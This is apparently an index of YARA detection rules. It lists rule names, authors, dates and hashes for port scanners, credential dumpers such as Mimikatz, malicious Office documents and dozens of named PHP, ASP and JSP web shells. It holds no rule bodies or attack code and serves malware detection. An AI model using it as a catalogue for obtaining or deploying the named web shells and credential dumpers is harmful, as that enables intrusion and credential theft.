malware_index CGISscan_CGIScan description: Auto-generated rule on file CGIScan.exe author: yarGen Yara Rule Generator by Florian Roth hash: 338820e4e8e7c943074d5a5bc832458a
malware_index IP_Stealing_Utilities description: Auto-generated rule on file IP Stealing Utilities.exe author: yarGen Yara Rule Generator by Florian Roth hash: 65646e10fb15a2940a37c5ab9f59c7fc
malware_index PortRacer description: Auto-generated rule on file PortRacer.exe author: yarGen Yara Rule Generator by Florian Roth hash: 2834a872a0a8da5b1be5db65dfdef388
malware_index scanarator description: Auto-generated rule on file scanarator.exe author: yarGen Yara Rule Generator by Florian Roth hash: 848bd5a518e0b6c05bd29aceb8536c46
malware_index _Bitchin_Threads_ description: Auto-generated rule on file =Bitchin Threads=.exe author: yarGen Yara Rule Generator by Florian Roth hash: 7491b138c1ee5a0d9d141fbfd1f0071b
malware_index portscan description: Auto-generated rule on file portscan.exe author: yarGen Yara Rule Generator by Florian Roth hash: a8bfdb2a925e89a281956b1e3bb32348
malware_index ProPort_zip_Folder_ProPort description: Auto-generated rule on file ProPort.exe author: yarGen Yara Rule Generator by Florian Roth hash: c1937a86939d4d12d10fc44b7ab9ab27
malware_index StealthWasp_s_Basic_PortScanner_v1_2 description: Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe author: yarGen Yara Rule Generator by Florian Roth hash: 7c0f2cab134534cd35964fe4c6a1ff00
malware_index BluesPortScan description: Auto-generated rule on file BluesPortScan.exe author: yarGen Yara Rule Generator by Florian Roth hash: 6292f5fc737511f91af5e35643fc9eef
malware_index scanarator_iis description: Auto-generated rule on file iis.exe author: yarGen Yara Rule Generator by Florian Roth hash: 3a8fc02c62c8dd65e038cc03e5451b6e
malware_index Angry_IP_Scanner_v2_08_ipscan description: Auto-generated rule on file ipscan.exe author: yarGen Yara Rule Generator by Florian Roth hash: 70cf2c09776a29c3e837cb79d291514a
malware_index crack_Loader description: Auto-generated rule on file Loader.exe author: yarGen Yara Rule Generator by Florian Roth hash: f4f79358a6c600c1f0ba1f7e4879a16d
malware_index WCE_Modified_1_1014 description: Modified (packed) version of Windows Credential Editor author: Florian Roth hash: 09a412ac3c85cedce2642a19e99d8f903a2e0354 score: 70
malware_index BypassUac_3 description: Auto-generated rule - file BypassUacDll.dll author: yarGen Yara Rule Generator hash: 1974aacd0ed987119999735cad8413031115ce35
malware_index APT_Proxy_Malware_Packed_dev author: FRoth date: 2014-11-10 description: APT Malware - Proxy hash: 6b6a86ceeab64a6cb273debfa82aec58 score: 50
malware_index Hacktools_CN_Panda_Burst description: Disclosed hacktool set - file Burst.rar author: Florian Roth date: 17.11.14 score: 60 hash: ce8e3d95f89fb887d284015ff2953dbdb1f16776
malware_index Hacktools_CN_Burst_Blast description: Disclosed hacktool set - file Blast.bat author: Florian Roth date: 17.11.14 score: 60 hash: b07702a381fa2eaee40b96ae2443918209674051
malware_index Jc_WinEggDrop_Shell description: Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt author: Florian Roth date: 23.11.14 score: 60 hash: 820674b59f32f2cf72df50ba4411d7132d863ad2
malware_index LinuxHacktool_eyes_pscan2 description: Linux hack tools - file pscan2 author: Florian Roth reference: not set date: 2015/01/19 hash: 56b476cba702a4423a2d805a412cae8ef4330905
malware_index CN_Portscan description: CN Port Scanner author: Florian Roth release_date: 2013-11-29 confidential: False score: 70
malware_index Mimikatz_Memory_Rule_1 author: Florian Roth date: 12/22/2014 score: 70 type: memory description: Detects password dumper mimikatz in memory
malware_index Mimikatz_Memory_Rule_2 description: Mimikatz Rule generated from a memory dump author: Florian Roth - Florian Roth type: memory score: 80
malware_index VSSown_VBS description: Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere author: Florian Roth date: 2015-10-01 score: 75
malware_index Payload_Exe2Hex description: Detects payload generated by exe2hex author: Florian Roth reference: https://github.com/g0tmi1k/exe2hex date: 2016-01-15 score: 70
maldocs_index Contains_hidden_PE_File_inside_a_sequence_of_numbers author: Martin Willing (https://evild3ad.com) description: Detect a hidden PE file inside a sequence of numbers (comma separated) reference: http://www.welivesecurity.com/2016/01/04/blackenergy-trojan-strikes-again-attacks-ukrainian-electric-power-industry/ date: 2016-01-09 filetype: decompressed VBA macro code
maldocs_index possible_exploit author: Glenn Edwards (@hiddenillusion) version: 0.1 weight: 3
maldocs_index XDP_embedded_PDF author: Glenn Edwards (@hiddenillusion) version: 0.1 ref: http://blog.9bplus.com/av-bypass-for-malicious-pdfs-using-xdp weight: 1
maldocs_index powershell
maldocs_index Contains_UserForm_Object author: Martin Willing (https://evild3ad.com) description: Detect UserForm object in MS Office document reference: https://msdn.microsoft.com/en-us/library/office/gg264663.aspx date: 2016-03-05 filetype: Office documents
maldocs_index malrtf_ole2link author: @h3x2b <tracker _AT h3x.eu> description: Detect weaponized RTF documents with OLE2Link exploit
maldocs_index maldoc_API_hashing author: Didier Stevens (https://DidierStevens.com)
maldocs_index maldoc_indirect_function_call_1 author: Didier Stevens (https://DidierStevens.com)
maldocs_index maldoc_indirect_function_call_2 author: Didier Stevens (https://DidierStevens.com)
maldocs_index maldoc_indirect_function_call_3 author: Didier Stevens (https://DidierStevens.com)
maldocs_index maldoc_find_kernel32_base_method_1 author: Didier Stevens (https://DidierStevens.com)
maldocs_index maldoc_getEIP_method_1 author: Didier Stevens (https://DidierStevens.com)
maldocs_index macrocheck Author: Fireeye Labs Date: 2014/11/30 Description: Identify office documents with the MACROCHECK credential stealer in them. It can be run against .doc files or VBA macros extraced from .docx files (vbaProject.bin files). Reference: https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html
webshells_index Backdoor_WebShell_asp description: Detect ASPXSpy author: xylitol@temari.fr date: 2019-02-26
webshells_index webshell_iMHaPFtp_2 description: Web Shell - file iMHaPFtp.php author: Florian Roth date: 2014/01/28 score: 70 hash: 12911b73bc6a5d313b494102abcf5c57
webshells_index webshell_caidao_shell_guo description: Web Shell - file guo.php author: Florian Roth date: 2014/01/28 score: 70 hash: 9e69a8f499c660ee0b4796af14dc08f0
webshells_index webshell_cihshell_fix description: Web Shell - file cihshell_fix.php author: Florian Roth date: 2014/01/28 score: 70 hash: 3823ac218032549b86ee7c26f10c4cb5
webshells_index webshell_asp_EFSO_2 description: Web Shell - file EFSO_2.asp author: Florian Roth date: 2014/01/28 score: 70 hash: a341270f9ebd01320a7490c12cb2e64c
webshells_index webshell_caidao_shell_ice_2 description: Web Shell - file ice.php author: Florian Roth date: 2014/01/28 score: 70 hash: 1d6335247f58e0a5b03e17977888f5f2
webshells_index webshell_asp_ice description: Web Shell - file ice.asp author: Florian Roth date: 2014/01/28 score: 70 hash: d141e011a92f48da72728c35f1934a2b
webshells_index webshell_asp_404 description: Web Shell - file 404.asp author: Florian Roth date: 2014/01/28 score: 70 hash: d9fa1e8513dbf59fa5d130f389032a2d
webshells_index webshell_webshell_cnseay02_1 description: Web Shell - file webshell-cnseay02-1.php author: Florian Roth date: 2014/01/28 score: 70 hash: 95fc76081a42c4f26912826cb1bd24b1
webshells_index webshell_php_fbi description: Web Shell - file fbi.php author: Florian Roth date: 2014/01/28 score: 70 hash: 1fb32f8e58c8deb168c06297a04a21f1
webshells_index webshell_B374kPHP_B374k description: Web Shell - file B374k.php author: Florian Roth date: 2014/01/28 score: 70 hash: bed7388976f8f1d90422e8795dff1ea6
webshells_index webshell_caidao_shell_404 description: Web Shell - file 404.php author: Florian Roth date: 2014/01/28 score: 70 hash: ee94952dc53d9a29bdf4ece54c7a7aa7
webshells_index webshell_ASP_aspydrv description: Web Shell - file aspydrv.asp author: Florian Roth date: 2014/01/28 score: 70 hash: de0a58f7d1e200d0b2c801a94ebce330
webshells_index webshell_Dx_Dx description: Web Shell - file Dx.php author: Florian Roth date: 2014/01/28 score: 70 hash: 9cfe372d49fe8bf2fac8e1c534153d9b
webshells_index webshell_MySQL_Web_Interface_Version_0_8 description: Web Shell - file MySQL Web Interface Version 0.8.php author: Florian Roth date: 2014/01/28 score: 70 hash: 36d4f34d0a22080f47bb1cb94107c60f
webshells_index webshell_wsb_idc description: Web Shell - file idc.php author: Florian Roth date: 2014/01/28 score: 70 hash: 7c5b1b30196c51f1accbffb80296395f
webshells_index webshell_webshell_cnseay_x description: Web Shell - file webshell-cnseay-x.php author: Florian Roth date: 2014/01/28 score: 70 hash: a0f9f7f5cd405a514a7f3be329f380e5
webshells_index webshell_phpkit_0_1a_odd description: Web Shell - file odd.php author: Florian Roth date: 2014/01/28 score: 70 hash: 3c30399e7480c09276f412271f60ed01
webshells_index webshell_Java_Shell description: Web Shell - file Java Shell.jsp author: Florian Roth date: 2014/01/28 score: 70 hash: 36403bc776eb12e8b7cc0eb47c8aac83
webshells_index webshell_simple_backdoor description: Web Shell - file simple-backdoor.php author: Florian Roth date: 2014/01/28 score: 70 hash: f091d1b9274c881f8e41b2f96e6b9936
webshells_index webshell_PHP_c37 description: Web Shell - file c37.php author: Florian Roth date: 2014/01/28 score: 70 hash: d01144c04e7a46870a8dd823eb2fe5c8
webshells_index webshell_PHP_b37 description: Web Shell - file b37.php author: Florian Roth date: 2014/01/28 score: 70 hash: 0421445303cfd0ec6bc20b3846e30ff0
webshells_index webshell_ghost_source_icesword_silic description: Web Shell - from files ghost_source.php, icesword.php, silic.php author: Florian Roth date: 2014/01/28 score: 70 super_rule: 1 hash0: cbf64a56306c1b5d98898468fc1fdbd8 hash1: 6e20b41c040efb453d57780025a292ae hash2: 437d30c94f8eef92dc2f064de4998695
webshells_index webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx description: Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php author: Florian Roth date: 2014/01/28 score: 70 super_rule: 1 hash0: a2516ac6ee41a7cf931cbaef1134a9e4 hash1: ef43fef943e9df90ddb6257950b3538f hash2: ae025c886fbe7f9ed159f49593674832 hash3: 911195a9b7c010f61b66439d9048f400 hash4: 697dae78c040150daff7db751fc0c03c hash5: 513b7be8bd0595c377283a7c87b44b2e hash6: 1d912c55b96e2efe8ca873d6040e3b30 hash7: e5b2131dd1db0dbdb43b53c5ce99016a hash8: 4108f28a9792b50d95f95b9e5314fa1e hash9: 41af6fd253648885c7ad2ed524e0692d hash10: 6fcc283470465eed4870bcc3e2d7f14d
webshells_index webshell_itsec_PHPJackal_itsecteam_shell_jHn description: Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php author: Florian Roth date: 2014/01/28 score: 70 super_rule: 1 hash0: 8ae9d2b50dc382f0571cd7492f079836 hash1: e2830d3286001d1455479849aacbbb38 hash2: bd6d3b2763c705a01cc2b3f105a25fa4 hash3: 40c6ecf77253e805ace85f119fe1cebb
webshells_index webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY description: Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php author: Florian Roth date: 2014/01/28 score: 70 super_rule: 1 hash0: b68bfafc6059fd26732fa07fb6f7f640 hash1: 42f211cec8032eb0881e87ebdb3d7224 hash2: 40a1f840111996ff7200d18968e42cfe hash3: 0712e3dc262b4e1f98ed25760b206836
webshells_index webshell_webshells_new_con2 description: Web shells - generated from file con2.asp author: Florian Roth date: 2014/03/28 score: 70 hash: d3584159ab299d546bd77c9654932ae3
webshells_index webshell_Expdoor_com_ASP description: Web shells - generated from file Expdoor.com ASP.asp author: Florian Roth date: 2014/03/28 score: 70 hash: caef01bb8906d909f24d1fa109ea18a7
webshells_index webshell_webshells_new_php2 description: Web shells - generated from file php2.php author: Florian Roth date: 2014/03/28 score: 70 hash: fbf2e76e6f897f6f42b896c855069276
webshells_index webshell_bypass_iisuser_p description: Web shells - generated from file bypass-iisuser-p.asp author: Florian Roth date: 2014/03/28 score: 70 hash: 924d294400a64fa888a79316fb3ccd90
webshells_index webshell_sig_404super description: Web shells - generated from file 404super.php author: Florian Roth date: 2014/03/28 score: 70 hash: 7ed63176226f83d36dce47ce82507b28
webshells_index webshell_webshells_new_JSP description: Web shells - generated from file JSP.jsp author: Florian Roth date: 2014/03/28 score: 70 hash: 495f1a0a4c82f986f4bdf51ae1898ee7
webshells_index webshell_dev_core description: Web shells - generated from file dev_core.php author: Florian Roth date: 2014/03/28 score: 70 hash: 55ad9309b006884f660c41e53150fc2e
webshells_index webshell_webshells_new_pHp description: Web shells - generated from file pHp.php author: Florian Roth date: 2014/03/28 score: 70 hash: b0e842bdf83396c3ef8c71ff94e64167
webshells_index webshell_webshells_new_pppp description: Web shells - generated from file pppp.php author: Florian Roth date: 2014/03/28 score: 70 hash: cf01cb6e09ee594545693c5d327bdd50
webshells_index webshell_webshells_new_code description: Web shells - generated from file code.php author: Florian Roth date: 2014/03/28 score: 70 hash: a444014c134ff24c0be5a05c02b81a79
webshells_index webshell_webshells_new_xxxx description: Web shells - generated from file xxxx.php author: Florian Roth date: 2014/03/28 score: 70 hash: 5bcba70b2137375225d8eedcde2c0ebb
webshells_index webshell_webshells_new_PHP1 description: Web shells - generated from file PHP1.php author: Florian Roth date: 2014/03/28 score: 70 hash: 14c7281fdaf2ae004ca5fec8753ce3cb
webshells_index webshell_webshells_new_php6 description: Web shells - generated from file php6.php author: Florian Roth date: 2014/03/28 score: 70 hash: ea75280224a735f1e445d244acdfeb7b
webshells_index webshell_GetPostpHp description: Web shells - generated from file GetPostpHp.php author: Florian Roth date: 2014/03/28 score: 70 hash: 20ede5b8182d952728d594e6f2bb5c76
webshells_index webshell_webshells_new_php5 description: Web shells - generated from file php5.php author: Florian Roth date: 2014/03/28 score: 70 hash: cf2ab009cbd2576a806bfefb74906fdf
webshells_index perlbot_pl description: Semi-Auto-generated - file perlbot.pl.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 7e4deb9884ffffa5d82c22f8dc533a45
webshells_index php_backdoor_php description: Semi-Auto-generated - file php-backdoor.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 2b5cb105c4ea9b5ebc64705b4bd86bf7
webshells_index Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php description: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: c6eeacbe779518ea78b8f7ed5f63fc11
webshells_index shankar_php_php description: Semi-Auto-generated - file shankar.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 6eb9db6a3974e511b7951b8f7e7136bb
webshells_index Casus15_php_php description: Semi-Auto-generated - file Casus15.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 5e2ede2d1c4fa1fcc3cbfe0c005d7b13
webshells_index small_php_php description: Semi-Auto-generated - file small.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: fcee6226d09d150bfa5f103bee61fbde
webshells_index shellbot_pl description: Semi-Auto-generated - file shellbot.pl.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: b2a883bc3c03a35cfd020dd2ace4bab8
webshells_index fuckphpshell_php description: Semi-Auto-generated - file fuckphpshell.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 554e50c1265bb0934fcc8247ec3b9052
webshells_index ngh_php_php description: Semi-Auto-generated - file ngh.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: c372b725419cdfd3f8a6371cfeebc2fd
webshells_index jsp_reverse_jsp description: Semi-Auto-generated - file jsp-reverse.jsp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 8b0e6779f25a17f0ffb3df14122ba594
webshells_index Tool_asp description: Semi-Auto-generated - file Tool.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 8febea6ca6051ae5e2ad4c78f4b9c1f2
webshells_index NT_Addy_asp description: Semi-Auto-generated - file NT Addy.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 2e0d1bae844c9a8e6e351297d77a1fec
webshells_index SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php description: Semi-Auto-generated - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 089ff24d978aeff2b4b2869f0c7d38a3
webshells_index phvayvv_php_php description: Semi-Auto-generated - file phvayvv.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 35fb37f3c806718545d97c6559abd262
webshells_index r57shell_php_php description: Semi-Auto-generated - file r57shell.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: d28445de424594a5f14d0fe2a7c4e94f
webshells_index rst_sql_php_php description: Semi-Auto-generated - file rst_sql.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 0961641a4ab2b8cb4d2beca593a92010
webshells_index wh_bindshell_py description: Semi-Auto-generated - file wh_bindshell.py.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: fab20902862736e24aaae275af5e049c
webshells_index lurm_safemod_on_cgi description: Semi-Auto-generated - file lurm_safemod_on.cgi.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 5ea4f901ce1abdf20870c214b3231db3
webshells_index c99madshell_v2_0_php_php description: Semi-Auto-generated - file c99madshell_v2.0.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: d27292895da9afa5b60b9d3014f39294
webshells_index w3d_php_php description: Semi-Auto-generated - file w3d.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 987f66b29bfb209a0b4f097f84f57c3b
webshells_index WinX_Shell_html description: Semi-Auto-generated - file WinX Shell.html.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 17ab5086aef89d4951fe9b7c7a561dda
webshells_index Dx_php_php description: Semi-Auto-generated - file Dx.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 9cfe372d49fe8bf2fac8e1c534153d9b
webshells_index csh_php_php description: Semi-Auto-generated - file csh.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 194a9d3f3eac8bc56d9a7c55c016af96
webshells_index pHpINJ_php_php description: Semi-Auto-generated - file pHpINJ.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: d7a4b0df45d34888d5a09f745e85733f
webshells_index sig_2008_php_php description: Semi-Auto-generated - file 2008.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 3e4ba470d4c38765e4b16ed930facf2c
webshells_index ak74shell_php_php description: Semi-Auto-generated - file ak74shell.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 7f83adcb4c1111653d30c6427a94f66f
webshells_index Rem_View_php_php description: Semi-Auto-generated - file Rem View.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 29420106d9a81553ef0d1ca72b9934d9
webshells_index STNC_php_php description: Semi-Auto-generated - file STNC.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 2e56cfd5b5014cbbf1c1e3f082531815
webshells_index aZRaiLPhp_v1_0_php description: Semi-Auto-generated - file aZRaiLPhp v1.0.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 26b2d3943395682e36da06ed493a3715
webshells_index zacosmall_php description: Semi-Auto-generated - file zacosmall.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 5295ee8dc2f5fd416be442548d68f7a6
webshells_index CmdAsp_asp description: Semi-Auto-generated - file CmdAsp.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 64f24f09ec6efaa904e2492dffc518b9
webshells_index simple_backdoor_php description: Semi-Auto-generated - file simple-backdoor.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: f091d1b9274c881f8e41b2f96e6b9936
webshells_index mysql_shell_php description: Semi-Auto-generated - file mysql_shell.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: d42aec2891214cace99b3eb9f3e21a63
webshells_index Dive_Shell_1_0___Emperor_Hacking_Team_php description: Semi-Auto-generated - file Dive Shell 1.0 - Emperor Hacking Team.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 1b5102bdc41a7bc439eea8f0010310a5
webshells_index Asmodeus_v0_1_pl description: Semi-Auto-generated - file Asmodeus v0.1.pl.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 0978b672db0657103c79505df69cb4bb
webshells_index Reader_asp description: Semi-Auto-generated - file Reader.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: ad1a362e0a24c4475335e3e891a01731
webshells_index phpshell17_php description: Semi-Auto-generated - file phpshell17.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 9a928d741d12ea08a624ee9ed5a8c39d
webshells_index SimShell_1_0___Simorgh_Security_MGZ_php description: Semi-Auto-generated - file SimShell 1.0 - Simorgh Security MGZ.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 37cb1db26b1b0161a4bf678a6b4565bd
webshells_index jspshall_jsp description: Semi-Auto-generated - file jspshall.jsp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: efe0f6edaa512c4e1fdca4eeda77b7ee
webshells_index rootshell_php description: Semi-Auto-generated - file rootshell.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 265f3319075536030e59ba2f9ef3eac6
webshells_index connectback2_pl description: Semi-Auto-generated - file connectback2.pl.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 473b7d226ea6ebaacc24504bd740822e
webshells_index shells_PHP_wso description: Semi-Auto-generated - file wso.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 33e2891c13b78328da9062fbfcf898b6
webshells_index backdoor1_php description: Semi-Auto-generated - file backdoor1.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: e1adda1f866367f52de001257b4d6c98
webshells_index elmaliseker_asp description: Semi-Auto-generated - file elmaliseker.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: b32d1730d23a660fd6aa8e60c3dc549f
webshells_index s72_Shell_v1_1_Coding_html description: Semi-Auto-generated - file s72 Shell v1.1 Coding.html.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: c2e8346a5515c81797af36e7e4a3828e
webshells_index hidshell_php_php description: Semi-Auto-generated - file hidshell.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: c2f3327d60884561970c63ffa09439a4
webshells_index kacak_asp description: Semi-Auto-generated - file kacak.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 907d95d46785db21331a0324972dda8c
webshells_index PHP_Backdoor_Connect_pl_php description: Semi-Auto-generated - file PHP Backdoor Connect.pl.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 57fcd9560dac244aeaf95fd606621900
webshells_index Antichat_Socks5_Server_php_php description: Semi-Auto-generated - file Antichat Socks5 Server.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: cbe9eafbc4d86842a61a54d98e5b61f1
webshells_index Antichat_Shell_v1_3_php description: Semi-Auto-generated - file Antichat Shell v1.3.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 40d0abceba125868be7f3f990f031521
webshells_index Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php description: Semi-Auto-generated - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 49ad9117c96419c35987aaa7e2230f63
webshells_index cyberlords_sql_php_php description: Semi-Auto-generated - file cyberlords_sql.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 03b06b4183cb9947ccda2c3d636406d4
webshells_index Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html description: Semi-Auto-generated - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 8a8c8bb153bd1ee097559041f2e5cf0a
webshells_index EFSO_2_asp description: Semi-Auto-generated - file EFSO_2.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: b5fde9682fd63415ae211d53c6bfaa4d
webshells_index lamashell_php description: Semi-Auto-generated - file lamashell.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: de9abc2e38420cad729648e93dfc6687
webshells_index Ajax_PHP_Command_Shell_php description: Semi-Auto-generated - file Ajax_PHP Command Shell.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 93d1a2e13a3368a2472043bd6331afe9
webshells_index JspWebshell_1_2_jsp description: Semi-Auto-generated - file JspWebshell 1.2.jsp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 70a0ee2624e5bbe5525ccadc467519f6
webshells_index Sincap_php_php description: Semi-Auto-generated - file Sincap.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: b68b90ff6012a103e57d141ed38a7ee9
webshells_index sh_php_php description: Semi-Auto-generated - file sh.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 330af9337ae51d0bac175ba7076d6299
webshells_index phpjackal_php description: Semi-Auto-generated - file phpjackal.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: ab230817bcc99acb9bdc0ec6d264d76f
webshells_index sql_php_php description: Semi-Auto-generated - file sql.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 8334249cbb969f2d33d678fec2b680c5
webshells_index cgi_python_py description: Semi-Auto-generated - file cgi-python.py.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 0a15f473e2232b89dae1075e1afdac97
webshells_index telnetd_pl description: Semi-Auto-generated - file telnetd.pl.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 5f61136afd17eb025109304bd8d6d414
webshells_index php_include_w_shell_php description: Semi-Auto-generated - file php-include-w-shell.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 4e913f159e33867be729631a7ca46850
webshells_index Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php description: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 6163b30600f1e80d2bb5afaa753490b6
webshells_index shell_php_php description: Semi-Auto-generated - file shell.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 1a95f0163b6dea771da1694de13a3d8d
webshells_index telnet_cgi description: Semi-Auto-generated - file telnet.cgi.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: dee697481383052980c20c48de1598d1
webshells_index ironshell_php description: Semi-Auto-generated - file ironshell.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 8bfa2eeb8a3ff6afc619258e39fded56
webshells_index backdoorfr_php description: Semi-Auto-generated - file backdoorfr.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 91e4afc7444ed258640e85bcaf0fecfc
webshells_index aspydrv_asp description: Semi-Auto-generated - file aspydrv.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 1c01f8a88baee39aa1cebec644bbcb99 score: 60
webshells_index cmdjsp_jsp description: Semi-Auto-generated - file cmdjsp.jsp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: b815611cc39f17f05a73444d699341d4
webshells_index h4ntu_shell__powered_by_tsoi_ description: Semi-Auto-generated - file h4ntu shell [powered by tsoi].txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 06ed0b2398f8096f1bebf092d0526137
webshells_index Ajan_asp description: Semi-Auto-generated - file Ajan.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: b6f468252407efc2318639da22b08af0
webshells_index PHANTASMA_php description: Semi-Auto-generated - file PHANTASMA.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 52779a27fa377ae404761a7ce76a5da7
webshells_index MySQL_Web_Interface_Version_0_8_php description: Semi-Auto-generated - file MySQL Web Interface Version 0.8.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 36d4f34d0a22080f47bb1cb94107c60f
webshells_index multiple_webshells_0002 description: Semi-Auto-generated - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _nst_php_php_img_php_php_nstview_php_php hash0: ddaf9f1986d17284de83a17fe5f9fd94 hash1: 17a07bb84e137b8aa60f87cd6bfab748 hash2: 4745d510fed4378e4b1730f56f25e569
webshells_index multiple_webshells_0003 description: Semi-Auto-generated - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _network_php_php_xinfo_php_php_nfm_php_php hash0: acdbba993a5a4186fd864c5e4ea0ba4f hash1: 2601b6fc1579f263d2f3960ce775df70 hash2: 401fbae5f10283051c39e640b77e4c26
